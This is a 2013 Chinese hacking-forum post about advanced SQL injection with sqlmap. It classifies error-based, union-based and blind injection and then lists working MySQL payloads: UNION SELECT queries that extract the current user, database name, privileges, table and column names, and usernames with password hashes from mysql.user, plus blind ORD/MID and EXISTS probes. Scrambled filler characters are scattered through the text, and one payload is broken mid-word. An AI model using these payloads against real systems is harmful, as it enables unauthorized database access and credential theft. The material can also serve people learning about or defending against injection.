找回密码
 立即注册
查看: 3108|回复: 0
打印 上一主题 下一主题

sqlmap高级注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-16 20:31:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。
% A8 \) k. t$ e2 N ; N7 E- b( i9 ^* R' X2 x# d
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表* Z' o+ |7 \2 w' X: B
9 C. T/ O% w' ?! n
分类标准        分类        备注
. i$ j* N. s; n5 L' }4 ?+ ]3 c* r4 E按字段类型        整型注入,字符型注入        0 K. J& {) q" \2 e1 z
按出现的位置        get注入,post注入,cookie注入,http header注入        8 y0 v" h2 g, b& D% Q
然而高级注入是这样的* H5 v1 T' l5 {7 ?0 [; i) w
# L+ R* t$ g% p; S9 Y! ~  `( I  f
高级注入分类        条件
( v$ v' i, S, {% a) v: r& {! berror-based sql        数据库的错误回显可以返回,存在数据库,表结构
  ]! B. o5 Y+ q/ m) l0 Ounion-based sql        能够使用union,存在数据库,表结构
( v- @8 x& J0 Ublind sql        存在注入* e* T1 C8 D1 h( C! A$ [+ L  r: y
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
; [; [: l) i9 ^2 x8 `5 B9 K+ L
4 _$ W. [( B9 G3 X# z* N好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火
+ [7 J- I$ T1 p' D0 _1 f1 |
! K" n9 O5 \9 u2 C3 a+ p' A附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。6 ^$ p4 P0 _9 I( N) d/ p
- l) a3 x) d- `# Q2 v% W3 d; G" k
这里用mysql说明( k. T! }& k( a; ^* n' }
- m1 H! R; O+ p8 T1 e1 c
e注入坛子里很多了,请看戳我或者再戳我% b% G  B$ U, i  v0 s
. N  N7 X( ~% J8 h
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的* j9 A( F' h) k" A: Q) y

8 u6 O( l2 G$ U8 z- R3 ]* V获取当前数据库用户名
9 E' G3 b) o  i+ e 7 d/ ]% L' i: V: t
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
  s( k- ?* s3 ?AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL! I# V$ c1 y7 [2 C4 D0 n# s
L, NULL#
4 I' A; U) p" m9 K+ Z注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
, y/ M+ _3 j: ~2 v! j7 N
7 T2 m7 v  ^' _0 N& F. h) S0 Q9 E获取数据库名9 f. ~& ^2 [/ I% B

1 W- I( F/ v5 V( k, PUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
- S( D) S* h4 v- i2 E获取所有用户名
5 R- U5 a9 B/ j% M6 J. o $ M  t' i. l6 ?4 C6 ^6 E
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#. `6 y5 r: e. V5 C% ?+ E
查看当前用户权限- Y3 c# [4 z8 J1 v' N
( A; [' F! r7 z$ c
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#+ F/ j. ]  P) j' q/ F
尝试获取密码,当然需要有能读mysql数据库的权限
$ _0 i# W, \" r6 J. O
- O8 a7 i; {- ^UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#
% R, y. |' j. T- X. y; J; _: a# ~获取表名,limit什么的自己搞啦
3 G! `% c3 w$ Z6 _
* x# V2 m7 H6 \. Y; J4 n; eUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
2 y1 [+ J% x9 W+ t3 Z1 ]/ R获取字段名及其类型! v  X+ B3 b6 p+ X4 u6 f: c+ c( N
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
  e7 {  |4 L  O: Y; M3 ] " x: G/ Y7 o( s& X; }2 I3 A3 V; z% f, C
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
+ y8 r# }) t3 ~% `8 O) N3 h: V% }1 C: C
' X  A. \7 ]/ J+ [6 B. O如:8 l2 f: Z4 ~/ {. w+ M
获取当前用户名+ D4 J4 G: _) V& o5 }8 S6 K

3 t$ X( B1 u$ @' T* R" f; xAND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
  {, ~- Q* j  u7 |; \+ B" D6 v获取当前数据库$ F( [3 t& K' i1 Y2 ]6 r4 K8 m
$ _# K2 a9 p+ ~5 a2 d3 e
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
$ X- E# K  F$ `4 G获取表名
) {* ^5 [: f* D
# u$ S- ^! k9 L- d$ C8 TAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 514 O  r% t# v& R' G
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。3 ~! v: W$ S; d/ q2 ?
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
4 U4 w, J0 M4 g3 l* d3 e爆表) L9 k5 ]6 y1 D7 n; p3 W; g# p. x& I

# s, X0 X  U+ |2 Y7 uAND EXISTS(select * from table)* J9 ~1 S7 ?% ?) ^4 p4 [
爆字段
8 B2 m! D$ ~, C* ~9 T2 O+ a   v6 _1 M' u, o+ j: M0 h2 y0 A9 y
AND EXISTS(select pwd from table)5 R! A9 a  v1 `
盲注的变化就比较多了,由于篇幅,只是举个例子而已。
4 p7 i; C6 u0 s7 R( f
/ n* b/ B% Y2 c' d# }" l/ r8 C- T5 ]本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。* e6 U4 w- _8 N! v6 D1 v0 ~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表